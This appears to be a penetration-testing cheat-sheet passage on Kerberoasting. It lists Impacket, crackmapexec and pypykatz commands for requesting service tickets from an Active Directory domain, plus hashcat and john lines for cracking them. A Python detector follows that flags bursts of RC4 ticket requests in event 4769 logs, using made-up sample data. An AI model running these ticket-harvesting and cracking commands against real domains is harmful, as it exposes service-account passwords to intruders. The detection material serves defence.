When a service account with a human-defined password has an SPN set, attackers can request a service ticket (ST) for this service and attempt to crack it offline. This is Kerberoasting.
Linux
```bash
# with a password
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

# with an NT hash
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'

crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter

pypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\username:Password@IP'

# Decrypt the hash
hashcat -m 13100 kerberoastables.txt $wordlist
john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt
```
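The defender's view of the requests above, as an added example that is not part of the original page: it flags a requester that obtains RC4 service tickets (etype 23, the type selected by `-e 23` and targeted by hashcat mode 13100) for several distinct user-account services in a short window, using the fields of Windows Security event 4769. The sample events, account names, the 5-minute window and the threshold of 3 are constructed assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23: what "-e 23" requests and hashcat -m 13100 cracks

def sample_event(time, user, ip, service, etype, status="0x0"):
    """Build a constructed record shaped like Security event 4769 fields."""
    return {"EventID": 4769, "TimeCreated": time, "TargetUserName": user,
            "IpAddress": ip, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}

# Constructed sample data (not real logs); names and addresses are made up.
EVENTS = [
    sample_event("2024-01-01T10:00:00", "alice@CORP.EXAMPLE", "::ffff:10.0.0.5", "svc_sql", "0x12"),
    sample_event("2024-01-01T10:00:05", "bob@CORP.EXAMPLE", "::ffff:10.0.0.9", "svc_sql", "0x17"),
    sample_event("2024-01-01T10:00:06", "bob@CORP.EXAMPLE", "::ffff:10.0.0.9", "svc_web", "0x17"),
    sample_event("2024-01-01T10:00:07", "bob@CORP.EXAMPLE", "::ffff:10.0.0.9", "svc_backup", "0x17"),
    sample_event("2024-01-01T10:00:08", "bob@CORP.EXAMPLE", "::ffff:10.0.0.9", "FILESRV01$", "0x17"),
    sample_event("2024-01-01T11:30:00", "carol@CORP.EXAMPLE", "::ffff:10.0.0.7", "svc_legacy", "0x17"),
]

def is_rc4_user_service_ticket(ev):
    """True for a successful 4769 that issued an RC4 ticket for a user-account service."""
    svc = ev["ServiceName"]
    return (ev["EventID"] == 4769
            and int(ev["Status"], 16) == 0
            and int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and not svc.endswith("$")        # machine accounts have random passwords
            and svc.lower() != "krbtgt")

def find_kerberoast_candidates(events, window=timedelta(minutes=5), threshold=3):
    """Map (requester, source IP) -> services when one requester obtained RC4
    tickets for >= threshold distinct services within the sliding window."""
    by_requester = defaultdict(list)
    for ev in filter(is_rc4_user_service_ticket, events):
        ts = datetime.fromisoformat(ev["TimeCreated"])
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].append((ts, ev["ServiceName"]))
    alerts = defaultdict(set)
    for key, hits in by_requester.items():
        hits.sort()
        start = 0
        for end, (ts, _) in enumerate(hits):
            while ts - hits[start][0] > window:   # drop requests older than the window
                start += 1
            services = {svc for _, svc in hits[start:end + 1]}
            if len(services) >= threshold:
                alerts[key] |= services
    return {key: sorted(svcs) for key, svcs in alerts.items()}
```

A single RC4 request (carol in the sample) stays below the threshold, so pair this with a review of why any user-account service still issues RC4 tickets at all.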